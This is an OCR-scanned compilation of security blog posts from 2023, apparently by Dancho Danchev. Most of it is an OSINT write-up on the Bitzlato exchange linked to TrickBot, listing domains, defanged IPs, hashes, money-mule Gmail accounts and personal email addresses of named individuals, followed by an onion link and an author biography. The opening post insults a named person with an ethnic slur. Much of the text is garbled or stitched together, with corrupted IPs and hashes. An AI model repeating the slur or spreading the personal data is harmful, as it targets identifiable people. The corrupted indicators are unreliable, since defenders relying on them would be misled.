1 JwIDKMnK3UJTcgJBj9AxkEbVcnWeP-X3x7n-qC481Znbj21g¢41Xzp 


19.2.12 Happy Holidays From The (Not) Republic of Bulgaria - An Analysis - Part 
Three (2023-02-07 23:38) 


[1] 
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How do you differentiate a gypsy between his mother - with all due respect to all the gypsies 
out there sticking to their families and mothers? [2]Yavor Kolev is the answer. 


Stay tuned! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEhnbJfICfBHRgN3jZwm1Y14hvZL2YgqhWn7Gr8go88WKpf Vm 
-TkQm2x6wRTYb- oCYBB7UtrRPBw9 J2YeFWOaGiUF8cnR5esTmswpsXx 
2. https: //www.linkedin.com/in/yavorkolev 


19.2.13 Exposing TrickBot’s Bitzlato Cryptocurrency Exchange - An OSINT Analysis 
(2023-02-09 19:26) 


[1] 
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successful investment management organizations. Our companies manage investments for 
millions of individuals and thousands of corporations and institutions. 


The Individual People Capital Group’s largest components are: 

¢ Individual People Funds, which ranks among the three largest mutual fund families in the 
U.S. - managed by Individual People Capital Research and Management Company, with assets 
under management of more than $750 billion 

¢ Individual People Capital Guardian Trust Company and the Individual People Capital Inter- 
national companies — providers of global investment management services for institutional 
clients, consultants and individuals, with assets under management of approximately $300 
billion 


For 75 years, we have followed a consistent philosophy and approach to generate con- 
sistent long-term investment results for our investors around the world. At the heart of our 
success is a commitment to a number of core beliefs: the importance of long-term investing, 
the value of in-depth global research, adherence to a disciplined investment management 
philosophy, and a code of ethics that emphasizes honesty and integrity." 


Known Gmail accounts participating in the money mule recruitment and exploit serving 
process courtesy of Individual People Capital Group: 

[27]groupindividualpeople @ gmail.com 

[28]newindividualpeople24 @ gmail.com 

[29]newworkgroupindividualpeople @ gmail.com 

[30]individualpeoplecapitalgroup9 @ googlemail.com 

[31]lindividualpeoplecapitalgroup8 @ googlemail.com 

[32]individualpeoplecapitalgroup7 @ googlemail.com 

individualpeoplecapitalgroup6 @ googlemail.com 

[33 ]individualpeoplecapitalgr @ googlemail.com 
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&\ © OS® 


Ce service a fait l’objet 
d’une saisie judiciaire 


Par le commandement de la gendarmerie dans le cyberespace 
sous I‘autorité du parquet de Paris 


vy & Oo 


GUARDKACIVIL Politie Police 


Just came across [2]this and I’ve decided to [3]elaborate and offer [4]actionable intelligence 
on the whereabouts of [5]TrickBot’s Bitzlato cryptocurrency exchange. 


Company name: Bitzlato Limited 
Company owner: Anatoly Legkodymov 


Company URLs: hxxp://bitzlato.com - 103.41.71.252; hxxp://bitzlato.net - 103.41.71.252; 
104.21.64.203; 104.24.117.5; 172.67.136.54; 104.24.116.5; 154.92.19.56; 107.161.23.204; 
192.161.187.200; 209.141.38.71 - hxxp://bitzla.to - hxxp://bitzlato.bz - hxxp://bitzlato.bz - 
hxxp://changebot.info 


Sample company _ social media account presence: hxxp://t.me/bitzlato; 
hxxp://www.reddit.com/r/Bitzlato/; hxxp://facebook.com/bitzlato; hxxp://instagram.com/bitzlato; 
hxxp://t.me/s/bitzlato _ru 


bz 


[6] 


Sample personally identifiable email address accounts known to have been involved in the 
campaign include: 


legkodymov.lev@gmail.com 
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globus290382@yandex.ru 
valentinka.ne@mail.ru 
valentin.karyagin@gmail.com 
v.karyagin@neovox.ru 
support@ideascup.me 
pleshevskie@gmail.com 
dmitriy@ideascup.me 
pleshevskiy@gmail.com 
ivanalert@mail.ru 


[7] 


Related domains known to have been registered by the same individuals: 
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hxxp://fineeps.com 

hxxp://btcbanker.info - legkodymov.lev@gmail.com 

hxxp://otcbanker.org - robert@worldtradedaily.com; telegrambanker@gmail.com 
hxxp://changebot.org 

hxxp://changebot.info 

hxxp://maccounter.com 

Sample Maltego graphs related to the company: 


[8] 


B 


Lev Legkodymov 


SN Zany Zany 
© © © 
changebot.info maccounter.com fineeps.com 
Zan) 4a) Zany 
oY oO ® 


bicbanker.info bitcbanker.org changebot.org 


[9] 


@ @ @ @ 


vaientinka_ ne@mail.ru globus 290382@ yandex.ru valentin Karyagin@gm ail.com v.Karyagin@ neovox.ru 


—< 
@) 


tiatessera.com 
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[10] 


dmitriy@ideascup.me pleshevskie@agmail.com 


ZN 


a 


pleshevski.ru 


@ 


support@ideascup.me 


[11] 


@ 


pleshevskiy@gmail.com 


@ 


dmitriy@ideascup.me 


® 


icetemple.net 


@ 


support@ideascup.me 


@ 


pleshevskie@gmail.com 


@ 


pleshevskiy@gmail.com 


Sample responding IPs known to have been involved in the campaign: 


172[.]67[.]70[.]135 
184[.]168[.]221[.]88 
50[.]63[.]202[.]65 
184[.]168[.]221[.]90 
50[.]63[.]202[.]53 
50[.]63[.]202[.]93 
160[.]153[.]128[.]46 
31[.]31[.]204[.]59 
188[.]114[.]97[.]7 
50[.]63[.]202[.]69 
188[.]114[.]97[.]15 
184[.]168[.]221[.]87 
188[.]114[.]96[.]0 
50[.]63[.]202[.]64 
172[.]64[.]167[.]33 
188[.]114[.]96[.]7 
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23[.]217[.]138[.]108 
23[.]202[.]231[.]167 
104[.]26[.13[.]83 
184[.]168[.]221[.]69 
109[.]201[.]135[.]45 
78[.]41[.]204[.]37 
95[.]183[.]53[.]20 
188[.]114[.]97[.]6 
192[.]161[.]187[.]200 
188[.]114[.]96[.]22 
70[.]39[.]125[.]243 
31[.]31[.]204[.]61 
103[.]41[.]71[.]252 
194[.]58[.]56[.]34 
194[.]58[.]56[.]32 
54[.]161[.]222[.]85 
52[.]73[.]179[.]54 
194[.]58[.]56[.]35 
184[.]168[.]221[.183 
194[.]58[.]56[.]40 
3[.]131[.]233[.]90 
3[.]130[.]204[.]160 
95[.]211[.]75[.]26 
109[.]201[.]133[.]71 
172[.]67[.]131[.]163 
104[.]21[.]4[.]41 
172[.]67[.]131[.]156 
104[.]21[.]4[.]35 
104[.]18[.]62[.]120 
104[.]21[.J29[.]112 
172[.]67[.]196[.]179 
104[.]18[.]63[.]120 
104[.]21[.]44[.]68 
104[.]31[.188[.]147 
104[.]31[.]89[.]147 
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172[.]67[.]148[.]132 
172[.]67[.]148[.]198 
104[.]28[.]14[.]149 
104[.]28[.]15[.]149 
104[.]31[.]81[.]102 
104[.]21[.]91[.]117 
172[.]67[.J217[.]133 
172[.]64[.]110[.]10 
172[.]64[.J111[.]10 
172[.]67[.J215[.]55 
104[.]21[.]37[.]237 
104[.]21[.]30[.]162 
172[.]67[.J173[.]59 
104[.]21[.]75[.]73 
172[.]67[.]216[.]154 
172[.]64[.J172[.]31 
172[.]64[.]173[.]31 
104[.]21[.]62[.]13 
172[.]67[.J217[.]172 
172[.]67[.]222[.]49 
104[.]21[.]54[.]10 
104[.]27[.]155[.]104 
172[.]64[.]167[.]33 
172[.]67[.J200[.]115 
104[.]27[.]154[.]104 
104[.]18[.]44[.]206 
104[.]18[.]45[.]206 
172[.]67[.J170[.]204 
172[.]64[.]197[.]5 
172[.]64[.]196[.]5 
172[.]64[.]136[.]22 
104[.]27[.]186[.]70 
104[.]27[.]187[.]70 
172[.]67[.]208[.]166 
104[.]24[.]119[.]52 
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172[.]67[.J211[.]216 
104[.]24[.]118[.]52 
172[.]67[.J200[.]216 
104[.]31[.]80[.]102 
104[.]31[.]79[.]154 
104[.]31[.]78[.]154 
172[.]67[.]186[.]246 
104[.]24[.]103[.]249 
172[.]67[.]158[.]208 
104[.]24[.]102[.]249 
172[.]67[.]198[.]173 
104[.]24[.J115[.J112 
172[.]64[.]108[.]20 
172[.]64[.]109[.]20 
104[.]24[.]108[.]69 
104[.]24[.]109[.]69 
172[.]67[.]208[.]8 
172[.]64[.]166[.]33 
172[.]67[.]156[.]70 
104[.]27[.]148[.J220 
104[.]27[.]149[.]220 
172[.]67[.]167[.J141 
172[.]64[.]130[.]14 
172[.]64[.J131[.]14 
172[.]64[.]202[.]5 
172[.]64[.]203[.]5 
104[.]18[.]49[.]28 
172[.]67[.]138[.]76 
172[.]64[.]104[.]4 
172[.]64[.]105[.]4 
104[.]31[.]66[.]244 
172[.]64[.]164[.]20 
172[.]64[.]165[.]20 
104[.]31[.]67[.]244 
172[.]67[.]208[.]152 
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104[.]27[.]130[.]71 
104[.]27[.J131[.]71 
104[.]28[.]30[.]58 
104[.]28[.]31[.]58 
104[.]28[.]24[.]57 
104[.]28[.]25[.]57 
172[.]67[.J131[.]147 
104[.]27[.]156[.]242 
104[.]27[.J157[.]242 
172[.]67[.J155[.]254 
104[.]27[.]144[.]175 
172[.]67[.]150[.]9 
104[.]27[.]145[.]175 
104[.]28[.]20[.]243 
104[.]28[.]21[.]243 
172[.]67[.J159[.]181 
104[.]27[.]128[.]230 
172[.]67[.]164[.]23 
104[.]27[.]129[.]230 
18[.]215[.J128[.]143 
192[.]157[.]56[.]141 
192[.]157[.]56[.]140 
185[.]107[.]56[.]55 
185[.]107[.]56[.]193 
192[.]157[.]56[.]142 
185[.]107[.]56[.]194 
185[.]107[.]56[.]195 
185[.]107[.]56[.]192 
192[.]157[.]56[.]139 
109[.]201[.]135[.]39 
207[.]244[.]67[.]138 
37[.]48[.]65[.]150 
207[.]244[.]67[.]139 
5[.]79[.]68[.]109 
37[.]48[.]65[.]149 
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172[.]67[.]167[.]170 
104[.]21[.]42[.]229 
18[.]213[.]250[.J117 
52[.]4[.]209[.]250 
162[.]210[.]195[.J111 
96[.]47[.]230[.]68 
109[.]201[.]135[.]45 
162[.]210[.]195[.]122 
199[.]115[.]115[.]118 
96[.]47[.]230[.]70 
81[.]171[.]22[.]4 
207[.]244[.]67[.]174 
109[.]201[.]133[.]69 
81[.]171[.]22[.]6 
96[.]47[.]230[.]69 
109[.]201[.]135[.]46 
109[.]201[.]135[.]43 
109[.]201[.]135[.]65 
162[.]210[.]195[.]123 
109[.]201[.]133[.]39 
109[.]201[.]135[.]44 
109[.]201[.]135[.]35 
37[.]48[.]65[.]151 
207[.]244[.]67[.]218 
199[.]115[.]115[.]116 
109[.]201[.]135[.]71 
207[.]244[.]67[.]216 
199[.]115[.]115[.]102 
37[.]48[.]65[.]148 
199[.]115[.]115[.]119 
207[.]244[.]67[.]214 
81[.]171[.]22[.]5 
5[.]79[.]68[.]110 
207[.]244[.]67[.]215 
96[.]47[.]230[.]67 
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harme 


INGLISH ITALIANO 


“Perfect Finance Conditions 


—— 
IPC ie 


heonse | about us | services | careers | contacts | login 


8 | Privacy poly 


[34]As well as the following emails, once again maintained by the same customer: 
individualpeoplecapitalgroup12 @ gmail.com 
individualpeoplecapitalgroup13 @ gmail.com 
individualpeoplecapitalgroup14 @ gmail.com 
individualpeoplecapitalgroup12 @ gmail.com 
individualpeoplecapitalgroup13 @ gmail.com 
individualpeoplecapitalgroup14 @ gmail.com 
individualpeoplecapitalgroup19 @ gmail.com 
individualpeople.one @ gmail.com 
people.individ @ gmail.com 

individ.people @ gmail.com 
individualpeople.too @ gmail.com 
new.individualpeople @ gmail.com 
individual.job.it @ gmail.com 
info.individualpeople @ gmail.com 
j.wilson.sup @ gmail.com 
new.individualpeople @ gmail.com 
people.individ @ gmail.com 

robert.jwn @ gogglemail.com 
robert.wilson.r1 @ gmail.com 

robert.wil.r @ gmail.com 
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95[.J211[.]75[.]25 
108[.]61[.]19[.]12 
172[.]93[.]194[.]160 
108[.]61[.]19[.]11 
85[.]159[.]233[.]44 
78[.]41[.]204[.]28 
162[.]210[.]196[.]167 
162[.]222[.]213[.]196 
78[.]41[.]204[.]34 
78[.]41[.]204[.]39 
162[.]222[.]213[.]199 
109[.]201[.]133[.]56 
162[.]210[.]199[.]65 
209[.]126[.]123[.]11 
109[.]201[.]133[.]23 
209[.]126[.]123[.]13 
37[.]48[.]65[.]155 
109[.]201[.]133[.]68 
95[.]211[.]75[.]10 
95[.]211[.]75[.]26 
95[.]211[.]75[.]16 
207[.]244[.]67[.]172 
207[.]244[.]67[.]173 
108[.]61[.]19[.]13 
46[.]166[.]182[.]54 
108[.]61[.]19[.]14 
162[.]222[.]213[.]197 
5[.]79[.]68[.]107 
104[.]237[.]196[.]115 
81[.J171[.]22[.]7 
172[.]93[.]194[.]62 
5[.]79[.]68[.]108 
46[.]166[.]182[.]62 
184[.]168[.]221[.]79 
104[.]27[.]176[.]87 
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104[.]27[.]177[.]87 
109[.]201[.]133[.]54 
162[.]210[.]196[.]166 
162[.]210[.]199[.187 
37[.]48[.]65[.]152 
199[.]115[.]116[.]216 
209[.]126[.]123[.]12 
207[.]244[.]65[.]58 
37[.]48[.]65[.]143 
37[.]48[.]65[.]136 
162[.]210[.]199[.185 
37[.]48[.]65[.]154 
109[.]201[.]133[.]73 
37[.]48[.]65[.]153 
37[.]48[.]65[.]145 
162[.]210[.]196[.]168 
52[.]O[.J217[.]44 
23[.]20[.]239[.]12 
52[.]54[.]24[.]134 
52[.]6[.]128[.]155 
91[.]195[.]240[.]13 
74[.]208[.]236[.]102 
31[.]220[.]16[.]53 
31[.]31[.]204[.]59 
103[.]41[.]71[.]252 
104[.]21[.]64[.]203 
104[.]24[.]117[.]5 
172[.]67[.]136[.]54 
104[.]24[.]116[.]5 
154[.]92[.]19[.]56 
107[.]161[.]23[.]204 
192[.]161[.]187[.]200 
209[.]141[.]38[.]71 
50[.]63[.]202[.]53 
104[.]21[.]61[.]156 
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172[.]67[.J211[.]138 
160[.]153[.]128[.]46 
172[.]67[.]70[.]135 
104[.]26[.]3[.183 
104[.]26[.]2[.]83 
162[.]159[.]138[.]185 
162[.]159[.]137[.]85 
172[.]67[.]74[.]48 
104[.]26[.]10[.]44 
104[.]26[.]11[.]44 
172[.]67[.]186[.]213 
104[.]21[.]60[.19 
104[.]21[.]51[.]145 
172[.]67[.]181[.]106 
104[.]21[.]69[.]194 
104[.]24[.J124[.]54 
104[.]24[.J125[.]54 
172[.]67[.J212[.]102 
172[.]64[.]166[.]18 
172[.]64[.]167[.]18 
172[.]64[.]194[.]2 
172[.]64[.]195[.]2 
104[.]18[.]42[.]185 
172[.]67[.]176[.]254 
104[.]18[.]43[.]185 
172[.]64[.J132[.]21 
172[.]64[.]133[.]21 
104[.]18[.]45[.]185 
172[.]67[.]176[.]253 
104[.]18[.]44[.]185 
172[.]67[.]187[.]191 
104[.]21[.]68[.]57 
104[.]21[.]43[.]43 
172[.]67[.]219[.]48 
172[.]67[.J215[.]32 
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104[.]21[.]59[.]56 
172[.]67[.]190[.]82 
104[.]21[.]76[.]60 
172[.]67[.]159[.]196 
104[.]21[.]9[.J111 
104[.]21[.]9[.]110 
172[.]67[.]159[.]195 
104[.]21[.]9[.]109 
172[.]67[.]159[.]194 
104[.]21[.]83[.]91 
172[.]67[.J220[.]239 
172[.]67[.]165[.]64 
104[.]27[.]145[.]226 
172[.]67[.]207[.]132 
104[.]18[.]40[.]76 
104[.]18[.]41[.]76 
104[.]31[.183[.]75 
104[.]31[.182[.]75 
104[.]24[.]124[.]157 
104[.]24[.]125[.]157 
104[.]27[.]151[.J157 
104[.]27[.]150[.J157 
172[.]64[.]99[.]15 
172[.]64[.]98[.]15 
172[.]64[.]173[.]16 
172[.]64[.]203[.]29 
172[.]64[.]202[.]29 
172[.]64[.]96[.]28 
172[.]64[.]97[.]28 
104[.]31[.]68[.]221 
172[.]67[.]166[.]166 
104[.]31[.]69[.]221 
172[.]67[.]146[.]41 
104[.]18[.]53[.]227 
104[.]18[.]52[.]227 
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172[.]67[.]165[.]4 
172[.]64[.J111[.]14 
172[.]64[.]110[.]14 
172[.]64[.]170[.]34 
172[.]64[.J171[.]34 
172[.]64[.J207[.]12 
172[.]64[.J206[.]12 
104[.]27[.]144[.]226 
104[.]21[.]79[.]147 
104[.]21[.]55[.]52 
172[.]67[.]144[.]212 
172[.]64[.]137[.]22 
172[.]67[.]184[.]144 
104[.]21[.]76[.]2 
172[.]67[.]168[.]239 
104[.]21[.]79[.]32 
172[.]64[.]202[.]7 
172[.]64[.]203[.]7 
172[.]67[.J222[.]59 
104[.]21[.]46[.]11 
104[.]21[.]49[.]148 
172[.]67[.]163[.]242 
172[.]67[.J220[.]103 
104[.]21[.]62[.]52 
172[.]64[.]169[.]16 
172[.]64[.]168[.]16 
172[.]64[.]105[.]13 
104[.]21[.]40[.]11 
172[.]64[.]167[.]16 
172[.]67[.J173[.]216 
172[.]64[.]166[.]16 
188[.]114[.]96[.]2 
172[.]64[.]137[.]31 
188[.]114[.]97[.]2 
172[.]64[.]136[.]31 
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188[.]114[.]96[.]3 
104[.]18[.]40[.]160 
104[.]21[.]76[.]225 
104[.]18[.]41[.]160 
172[.]67[.J201[.]234 
172[.]64[.]172[.]16 
104[.]21[.]70[.]92 
104[.]24[.]113[.]28 
172[.]67[.J222[.]47 
104[.]24[.J112[.]28 
104[.]21[.]86[.]68 
178[.]128[.]139[.]249 
172[.]67[.]216[.]91 
167[.]99[.]215[.J175 
104[.]21[.]39[.]132 
185[.]165[.]123[.]206 
172[.]67[.]145[.]207 
45[.]77[.]55[.]61 
172[.]67[.]146[.]78 


Sample photos of the individuals behind the campaign: 


[12] 
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[13] 


26619 


[14] 


26620 


[15] 
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Oral cigae —— Tid 


[16] 
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rob.wilson.r @ googlemail.com 
wilson.wrt @ gmail.com 
workgroupindividualpeople @ gmail.com 


There are cases when money mule recruiters are interested in plain simple botnet build- 
ing, case in point is a situation where a spammed money mule spam message advertising 
[35]individualpeople .biz/go.php?sid=7 was actually [36]serving a malicious PDF, next to 
linking to the recruitment site itself (individualpeople .org). 


In order to further demonstrate the ongoing standardizing of the money mule recruit- 
ment process through template-ization, it’s time to expose the bogus brands portfolio, and 
associated domains of a money mule recruitment organization that has been relying on an 
identical template over the past couple of years. In fact, in May, 2009, a [37]botnet which 
was used by Ukrainian dating scam agency Confidential Connections was not only found to 
be directly related to the money mule recruitment gang, but the cybercriminals used one of 
the [38]recruitment domains as a command and control server for their botnet spamming 
operations, with the domain itself and one of the sampled dating scam ones registered under 
the same email. 


Srokerage services Mclude support in 
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NCA 


National Crime Agency 


[19] 
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‘National Crime Agency 


Sample related MD5s known to have phoned back to these domains: 
7a6f2d84c3eb8db4d91ce07ea3ac9772bd5fea06fe2c762f0077cba876ed4b13 
994ecf65c45d64965191445dcd5408eab1cd5b8a99a7073968da5cd14036ea4b 
7c074a18640479cc1073f56dedd3b7794ffd7d3c1605f3660cd2d5c480b55dcc 
d14461d2642994a3ef194c6f1c4d542d48bc8d6ccbf16f18a3e4ef0d61739ca5 
fd5541baaabab71fa71762c8490205dbc16af038a5243923593845f922b501lee 
411cfd693f38f0b39d5689e48b5b7ec4d660ba95alec6d842d8fcc1b116994a7 
2e12c3bf63facebb6e4fac6e2b0ee715de2127d4ace510b1a188158d3588fabc 
d29544e4e66e74468d38f667603a55da657cd10b5ec999e615b9a7b920f32441 
3305706d89aa2ef1e0a03f381f94c78c00b11b2bd5b400d73ee010c876bd77cc 
68130f4b25cfa991c20f73b508a795a7a81b54d04fb7b39d3fb663aae43dee4a 
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c64edf4e3c7fal54fe85eb3dd69e99a561dcfael6e24a4f5360527b2137f8925 
75a2a61d9822fcf3b41b43a2a9b2bfa2bc7b723aa57180b404e6bc9b36d18337 
2164f91e3aad0cc69015d0ba9e33d6cdcf7595c48161c2858566e64008ef9ae9 
a9c93131325212be8fc88c6b8cb9b83a32c7c39875b2861d79fec1851a067fba 
78e72clca6d4c2c0e4bb9be95 7d6a8302ddd0c24d3c51f28482c5211f9c90074 
ad01f17ebf40b4d66598fb30be1la84a5f3fdda301b8bed285b6b2c966d68c463 

The domains are currently seized and sinkholed by the [20]ShadowServer Foundation. 


Stay tuned! 


1. https://blogger. googleusercontent.com/img/b/R29VZ2x1/AVvXsEgYiD1h- XMuZOqHmIEOM- 13HMBcUJt1Nilgi0BsXfAuzRUg 
1PQ9kKbnIuufrD90j pPWZRWoTFsDPuHbDEj AZJVooZB9zsIX9H1u2 
2. https://home.treasury.gov/news/press-releases/jy1256 


ttps://www.fincen.gov/news/news-releases/fincen-identifies-virtual-currency-exchange-bitzlato-primary-m 


oney- laundering 


4. https: //ddanchev. blogspot .com/2022/02/exposing-conti-ransomware-gang-osint_28.htm 
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5. https: //ddanchev. blogspot .com/2022/03/exposing-trickbot-malware-gang-osint.htm 
6. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEhPgG5XleJQnNsAnJAI IbzCwWfb8rLcGihcEBaq_q_kW9X5yQ 
yD_kXtUW-ogPo0_cTGatck16Z-aunbNpde j Pk4MHyp5QrqzHLpCId 
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14 
d1GWzn1- AhBNZ2iFrB4CrQUz7r0aLXu-kJlaMLwsMkAEMI qqHUXFtNx 

15. https://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVvXsEgGC-vS2EfbmLP jODe1LAgTh3uJ j 8E5WiX6vDeTh_qDnMo 


pQToZCxUCyhFnckI JaDPKy6qUZa_Xs1Bq-eGsrffcOI0JcrvGhriZkoE 
16. https://blogger.googleusercontent . com/img/b/R29vZ2x1/AVvXsEgwWwNQYfpHLO9aJvf 8eN56LeHNI gQGh5uj Je4aTxHTcwne 
WdcSousqeJg3Tu6-aaL7gAImoRt-GY1fF jRfwqbsI59tRQ1lkqdzLIy. 


17. 
Xvy_xv7y_GHKOwQDm4 JE11tkKMim-QjviMk0q9jeeVwgQP2v-QreC5zx9 
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19.2.14 New Permanent and Daily Updated Official Dark Web Onion (2023-02-13 13:11) 


[1] 


Welcome to Dancho Danchev's Dark Web Onion - “The Future of U.S Intelligence Community and Intelligence Gathering 2.0" - Proprietary and 
Community-Driven Single-Page Summary Proactively Offering General Security and Tailored Access Operations Recommendation Advice Including 
Proprietary access to OSINT Data on Key Individuals and Communities-Of-Notice Within the Security Industry Including Various Key Members of the Russian 
and Eastern European Cybercrime Underground Obtained Using OSINT (Open Source Intelligence) Techniques and Methodologies Including Technical 
Collection Using Public Sources Courtesy of the Project Operator 


Project Operator: Dancho Danchev | Email; dancho.danchevgdhush.com | Donate BitCoin: 1H74hr6hAk6vS96DbhsueQgxqdeVgNgqzv5 


Dear Dark Wee 


Curt) DUS) WM Pre b302 to Cresent a Dechare where TatOreD ACESS Bhd EDDM) ODERBONS COM tahe LADLE BMI FOSSIDE BEODOSE aChuM Tamored ACCESS ODEraONS INCUGN] MmaMOgS and leCmques 10 protect pourselt 


I) soem pon type of ataces 


DANCHO DANCHEV'S 
SECURITY RESEARCH 
FOR WEBROOT INC 


Dancho Danchev's 


Dear blog readers, 


I've decided to share with everyone my new and permanent Dark Web Onion URL 
([2]http://3hqc6vio6éqqmbzuev5xanurcuhgwnnpgk3so6y25bjgzmgqcxumkzpad.oni on) where | 
intend to issue daily updates where | urge you to bookmark it and visit it on a daily basis in 
order to grab the latest content. 


Stay tuned! 


1. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEiB8xqOX2yni-ro5K9EP1IxIWQNoi2TLpGNDauexX j4gDi4wWb 


Zs3FBHcp3ztrbJh7dXoJXoR6N3FmWZhXYTQnYwjCxnj VNcA3vmBmw. 
2. http: //3hqc6vio6qqmbzuev5xanurcuhgwnnpgk3so6y 25bj gzmgqcxumkzpad. onion/ 


19.2.15 Whois Dancho Danchev? - Part Two (2023-02-13 13:11) 


[1] 
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Hello everyone, 


This is Dancho and | would like to welcome you to my official "I’m now officially back" blog 
post detailing some of my current future and upcoming projects including a brief introduction 
to who | am to those unfamiliar with my research activities throughout the years where you 
can freely grab a E-Book copy of my blog in a full offline fashion from [2]here. 


My name is Dancho Danchev I’m a 38 years old security blogger OSINT analyst and threat intel- 
ligence analyst from Bulgaria. I’m currently running one of the security industry’s most popular 
security publications which is my personal blog - Dancho Danchev’s Blog - Mind Streams of In- 
formation Security Knowlwedge. I’ve been running my publication since December, 2005 and 
throughout the years | had an overage of 7,000 RSS feed subscribers including 5.6M page views 
throughout the years making my blog an extremely important switchboard to the world of se- 
curity blogging OSINT research and analysis threat intelligence analysis and most importantly 
cybercrime fighting research and analysis. 


[3] 
26629 


by Dancho Danchev 


https://ddanchev.blogspot.com | Email: 
dancho.danchev@hush.com 


I’m also acting as a DNS Threat Reseaarcher at WhoisXML API. 


It’s been a while since I’ve last posted a quality video on YouTube and I’ve decided that this 
is going to be a pretty long and decent introduction into what I’ve been up to online since the 
90’s up to present day where I’m an internationally recognized cybercrime researcher security 
blogger and threat intelligence analyst. In this rather long video I'll walk you through my 
experience as a hacker enthusiast during the 90’s up to present day and I'll also discuss in- 
depth a variety of personal projects including to offer a general discussion and overview on a 
variety of key topics that are currently active within the security industry including my personal 
career such as for instance. 


Among my key accomplishments include my "lawful surveillance" and "lawful interceprtion" 
experience as teenage hacker the production of the popular Astalavista Security Newsletter 
circa 2003-2006 including the "take-down" of the Koobface botnet [MP3] including a participa- 
tion in Top Secret GCHQ program called "Lovely Horse" including regular appearance in major 
news publications for interview and expert opinion including Techmeme, ZDNet, CNN, PCWorld, 
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SCMagazine, TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine and regular security 
and research presentation appearance at major security events at GCHQ, Interpol, InfoSec 
Europe, RSA Europe and CyberCamp. 


I’m an internationally recognized expert in the field of cybercrime fighting and threat intel- 
ligence gathering having actively pioneered my own methodlogy for processing threat intel- 
ligence which leads me to a successful set of hundreas of high-quality anaysis and research 
articles published at the industry’s leading threat intelligence blog - ZDNet’s Zero Day, Dancho 
Danchev’s Mind Streams of Information Security Knowledge and Webroot’s Threat Blog with 
his research featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister, NYTimes, 
CNET, ComputerWorld, H+Magazine currently producing threat intelligence at the industry’s 
leading threat intelligence blog - Dancho Danchev’s - Mind Streams of Information Security 
Knowledge. 


With my research featured at RSA Europe, CyberCamp, InfoSec, GCHQ and Interpol | continue 
to actively produce threat intelligence at the industry’s leading threat intelligence blog - Dan- 
cho Danchev’s - Mind Streams of Information Security Knowledge publishing a diverse set of 
hundreds of high-quality research analysis detailing the malicious and fraudulent activities at 
nation-state and malicious actors across the globe. 


In the past I’ve been a member of: 

* A Member to Warlndustries (http://warindustries.com) 

* List Moderator at BlackCode Ravers (http://blackcode.com) 

* Contributor Black Sun Research Facility (http://blacksun.box.sk) (BSRF) 


* List Moderator Software Contributor (TDS-2 Trojan’ Information Database) 
(https://packetstormsecurity.com/files/25533/tlibrary.zip.html) DiamondCS Trojan Defense 
(http://tds.diamondcs.com.au) 


* Contributor to LockDownCorp (http://lockdowncorp.com) 
* Contributor to HelpNetSecurity (http://forbidden.net-security.org) 
* A Security Consultant for Frame4 Security Systems (http://frame4.com) 


* Contributor to TechGenix’s WindowSecurity.com (http://www.windowsecurity.com/authors/d- 
ancho-danchev/) 


* Technical Collector - LockDownCorp - (https://lockdowncorp.com) 

* Managing Director - Astalavista Security Group - (https://astalavista.com) 
* Security Consultant - Wandera - (https://wandera.com) 

* Threat Intelligence Analyst - GroupSense - (https://groupsense.io) 

* Security Consultant - KCS Group Europe - (https://kcsgroup.com) 

* OSINT Analyst - Treadstone71 - (https://treadstone71.com) 

* Security Blogger - Armadillo Phone - (https://armadillophone.com) 

* Security Blogger for ZDNet (http://www.zdnet.com/blog/security/) 

* Threat Intelligence Analyst for Webroot (https://www.webroot.com/blog/) 


| would like to thank the following people for contributing to the Scene throughout the 90’s up 
to present day and for keeping up the good work part of Astalavista.com’s Security Newsletter 
which | produced circa 2003-2006. 
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* Proge — http://www.progenic.com/ 

* Jason Scott — http://www.textfiles.com/ 

* Kevin Townsend — http://www.Itsecurity.com/ 

* Richard Menta — http://www.bankinfosecurity.com 
* MrYowler — http://www.cyberarmy.net/ 

* Prozac — http://www.astalavista.com/ 

* Candid Wuest — http://www.trojan.ch/ 

* Anthony Aykut — http://www.frame4.com/ 

* Dave Wreski — http://www.linuxsecurity.com/ 

* Mitchell Rowtow — http://www.securitydocs.com/ 
* Eric (SnakeByte) — http://www.snake-basket.de/ 
* Bjorn Andreasson — http://www.warindustries.com/ 
* Bruce — http://www.dallascon.com/ 

* Nikolay Nedyalkov — http://www.iseca.org/ 

* Roman Polesek — http://www.hakin9.org/en/ 

* John Young — http://www.cryptome.org/ 

* Eric Goldman — http://www.ericgoldman.org/ 

* Robert — http://www.cgisecurity.com/ 

* Johannes B. Ullrich — http://isc.sans.org/ 

* Daniel Brandt — http://google-watch.org/ 

* David Endler — http://www.tippingpoint.com/ 

* Vladimir, 3APA3A — http://security.nnov.ru 


In this upcoming series of blog posts I’ll discuss in-depth a variety of personal projects and 
current and ongoing both real-time current and historical research and analysis activities in 
the following categories such as for instance: 


- My Dark Web Onion 

- My Uncle George Law Enforcement and OSINT Enrichment Operation 
- My Cybercrime Forum Data Set 

- My Unit-123.org E-Shop for Intelligence Deliverables Project 

- My Offensive Warfare 2.0 Threat Intelligence Clearing House Project 
- My Disruptive Individual’s Threat Intelligence Feed 

- My Current work as a DNS Threat Researcher with WhoisXML API 

- How | ended up in Snowden’s Archive?a 

- How | ended up on Wikileaks? 


- How | made it into several comparative academic studies on the quality of sharing threat 
intelligence and cybercrime research information? 
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Brand names for Money Mule Organizations using a standardized template offered by a 
single vendor, all known to have been "set up in 1990 in New York, the USA by three 
enthusiasts who have financial education" : Affina Group Inc; Alliance Group Inc; Annuity 
Group Inc; Archway Group Inc; Armor Group Inc; Assurity Group Co; Assurity Group Inc; BFS 
Group Inc; CDI Group Inc; Cosco Group Inc; Dove Group Inc; Eagle Group Inc; Entrust Group 
Inc; Extreme Group Inc; Flat Group Inc; Holding Group Inc; Integrity Group Inc; Invalda Group 
Inc; Key Group Inc; Liberty Group Inc; Lime Group Inc; Massive Group Inc; Melson Group Inc; 
MENA Group Inc; O Pm Group Main; OPM Group Inc; Premier Group Inc; Prime Group Inc; 
Prospera Group Inc; Puritan Group Inc; Reach Group Inc; Redeye Group Inc; Regency Group 
Inc; Rengo Group Inc; River Group Inc; Saturn Group; Scope Group Inc; Stock Group Inc; Strol 
